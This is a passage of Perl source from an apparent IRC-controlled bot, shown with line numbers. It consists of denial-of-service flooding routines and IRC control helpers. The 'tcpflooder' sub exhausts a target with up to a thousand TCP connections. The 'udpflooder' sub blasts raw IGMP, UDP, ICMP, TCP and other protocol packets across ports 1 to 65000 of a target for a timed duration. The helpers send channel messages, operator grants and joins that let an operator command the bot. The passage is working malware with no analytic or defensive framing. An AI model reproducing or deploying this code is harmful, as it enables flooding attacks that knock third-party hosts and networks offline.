sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); 1625 | if ($c == "$linas_max") { 1626 | $c=0; 1627 | sleep $sleep; 1628 | } 1629 | } 1630 | exit; 1631 | } 1632 | } 1633 | } 1634 | 1635 | sub tcpflooder { 1636 | my $itime = time; 1637 | my ($cur_time); 1638 | my ($ia,$pa,$proto,$j,$l,$t); 1639 | $ia=inet_aton($_[0]); 1640 | $pa=sockaddr_in($_[1],$ia); 1641 | $ftime=$_[2]; 1642 | $proto=getprotobyname('tcp'); 1643 | $j=0;$l=0; 1644 | $cur_time = time - $itime; 1645 | while ($l<1000){ 1646 | $cur_time = time - $itime; 1647 | last if $cur_time >= $ftime; 1648 | $t="SOCK$l"; 1649 | socket($t,PF_INET,SOCK_STREAM,$proto); 1650 | connect($t,$pa)||$j--; 1651 | $j++;$l++; 1652 | } 1653 | $l=0; 1654 | while ($l<1000){ 1655 | $cur_time = time - $itime; 1656 | last if $cur_time >= $ftime; 1657 | $t="SOCK$l"; 1658 | shutdown($t,2); 1659 | $l++; 1660 | } 1661 | } 1662 | 1663 | sub udpflooder { 1664 | my $iaddr = inet_aton($_[0]); 1665 | my $msg = 'A' x $_[1]; 1666 | my $ftime = $_[2]; 1667 | my $cp = 0; 1668 | my (%pacotes); 1669 | $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; 1670 | 1671 | socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; 1672 | 1673 | socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; 1674 | socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; 1675 | socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; 1676 | return(undef) if $cp == 4; 1677 | my $itime = time; 1678 | my ($cur_time); 1679 | while ( 1 ) { 1680 | for (my $porta = 1; $porta <= 65000; $porta++) { 1681 | $cur_time = time - $itime; 1682 | last if $cur_time >= $ftime; 1683 | send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; 1684 | send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; 1685 | send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; 1686 | send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; 1687 | 1688 | for (my $pc = 3; $pc <= 255;$pc++) { 1689 | next if $pc == 6; 1690 | $cur_time = time - $itime; 1691 | last if $cur_time >= $ftime; 1692 | socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; 1693 | send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; 1694 | } 1695 | } 1696 | last if $cur_time >= $ftime; 1697 | } 1698 | return($cur_time, %pacotes); 1699 | } 1700 | 1701 | sub ctcp { 1702 | return unless $#_ == 1; 1703 | sendraw("PRIVMSG $_[0] :\001$_[1]\001"); 1704 | } 1705 | sub msg { 1706 | return unless $#_ == 1; 1707 | sendraw("PRIVMSG $_[0] :$_[1]"); 1708 | } 1709 | sub notice { 1710 | return unless $#_ == 1; 1711 | sendraw("NOTICE $_[0] :$_[1]"); 1712 | } 1713 | sub op { 1714 | return unless $#_ == 1; 1715 | sendraw("MODE $_[0] +o $_[1]"); 1716 | } 1717 | sub deop { 1718 | return unless $#_ == 1; 1719 | sendraw("MODE $_[0] -o $_[1]"); 1720 | } 1721 | sub j { &join(@_); } 1722 | sub join { 1723 | return unless $#_ == 0; 1724 | sendraw("JOIN $_[0]"); 1725 | } 1726 | sub p { part(@_); } 1727 | sub part { 1728 | sendraw("PART $_[0]"); 1729 | } 1730 | sub nick { 1731 | return unless $#_ == 0; 1732 | sendraw("NICK $_[0]"); 1733 | } 1734 | sub quit { 1735 | sendraw("QUIT :$_[0]"); 1736 | } 1737 | --------------------------------------------------------------------------------